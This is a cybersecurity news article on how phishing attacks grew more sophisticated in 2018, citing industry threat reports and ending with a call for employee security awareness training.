Winter’s Cold Won’t Put a Freeze on Phishing

2018 was the year of the phish, and phishing attacks are only growing more sophisticated

Despite the bitter temperatures that January brings, fishing enthusiasts will brave the cold and traverse across the ice with saws and augers to drop a line or a spear in hopes of catching something. As it is on Lake Erie, so it is in the digital world. Freezing or not, on ice or online, “a phisher’s gonna phish.”

Just as the techniques of ice fishing have evolved over the past decades, so, too, have online phishing attacks grown more sophisticated. If 2017 was the year of ransomware, 2018 was the year of the phish, according to Proofpoint’s “State of the Phish 2019.”

It’s true that email has long been the attack vector of choice for many hackers, but “social engineering techniques are also used outside of email to gather data and infiltrate your organization. Cybercriminals regularly use pretexting, vishing, and smishing attacks to try to penetrate your defenses,” according to the report.

Many organizations have started incorporating simulated attacks into their security awareness trainings, which has caused attackers to become more creative. The “2019 State of Malware Report” recently published by Malwarebytes found that Emotet and TrickBot were effectively used in attacks that included “distribution via malspam disguised as legitimate email—your classic phishing/spear phishing campaign.”

Understanding New Phishing Trends

With the explosion of Office 365, attacks have evolved into more coordinated, multi-phased events.

“Phishing used to be much more isolated: hackers would send a PayPal phishing email to harvest credentials and immediately extract the funds associated with those accounts,” said Adrien Gendre, Vade Secure chief solutions architect. “Hackers first send phishing emails to harvest Office 365 credentials. Then, they use those compromised accounts to conduct targeted attacks laterally within the organization.”

In fact, Carbon Black reported in its recently published “2019 Global Threat Report” that nearly 60 percent of attacks today involve lateral movement. As a result, attackers are penetrating the networks and lurking about, identifying additional targets as they move through the different stages of an attack.

“It’s actually easier and more effective to take this phased approach because the spear phishing emails come from legitimate accounts inside your company—making the attacks virtually impossible to detect,” Gendre said.

Malicious actors are also exploiting zero-days in browsers and plugins that, according to Malwarebytes, were combined with spear phishing or social engineering attacks embedded within Office files.

Non-malware and fileless attacks also floated to the top as one of last year’s most popular attack methods. According to Carbon Black, “These types of attacks often originated from phishing campaigns that are leveraging Microsoft Office Word documents with obfuscated VBScripts. … This represented an evolution of current macro attack techniques, where these types of cmdlets are not typically associated with phishing campaigns.”

Attackers are also marrying two techniques into one single attack, as was reported by MalwareHunterTeam. In a recently discovered ransomware attack, researchers found that victims trying to pay the ransom were directed to a PayPal landing page that was actually a link to a phishing page, where their login credentials were stolen.

How to Get Ahead of a Big Phish

The Proofpoint report found that 83 percent of security professionals reported a higher rate of all types of phishing attacks in 2018, educating employees has never been more essential. In fact, nearly 60 percent of organizations that included such training in their cybersecurity awareness programs reported a marked increase in their employees being able to detect suspicious emails.

Though many employees were able to correctly define phishing, only 23 percent correctly identified smishing (SMS phishing) and as little as 18 percent knew what vishing (voice phishing) is. Part of the problem is that the tides continue to change, resulting in a constant ebb and flow of what employees need to know.

Education has to evolve at pace with the threats. It’s not a one shot annual box check. In a press release, Joe Ferrara, general manager of security awareness training for Proofpoint, noted: “As these threats grow in scope and sophistication, it is critical that organizations prioritize security awareness training to educate employees about cybersecurity best practices and establish a people-centric strategy to defend against threat actors’ unwavering focus on compromising end users.”

Kacy Zurkus

Featured eBook
Managing the AppSec Toolstack

Managing the AppSec Toolstack

The best cybersecurity defense is always applied in layers—if one line of defense fails, the next should be able to thwart an attack, and so on. Now that DevOps teams are taking  more responsibility for application security by embracing DevSecOps processes, that same philosophy applies to security controls. The challenge many organizations are facing now ... Read More
Security Boulevard

Kacy Zurkus

Prior to joining RSA Conference as a Content Strategist, Kacy Zurkus was a cybersecurity and InfoSec freelance writer as well as a content producer for Reed Exhibition's security portfolio. Zurkus was a regular contributor to Dark Reading, Infosecurity Magazine, Security Boulevard and IBM's Security Intelligence. She has also contributed to several industry publications, including CSO Online, The Parallax, and K12 Tech Decisions. During her time as a journalist, she covered a variety of security and risk topics and also spoke on a range of cybersecurity topics at conferences and universities, including Secure World and NICE K12 Cybersecurity in Education. Zurkus has nearly 20 years experience as a high school teacher on English and holds an MFA in Creative Writing from Lesley University (2011). She earned a Master's in Education from University of Massachusetts (1999) and a BA in English from Regis College (1996). In addition, she's also spoken on a range of cybersecurity topics at conferences and universities, including SecureWorld Denver and the University of Southern California.

kacy-zurkus has 62 posts and counting.See all posts by kacy-zurkus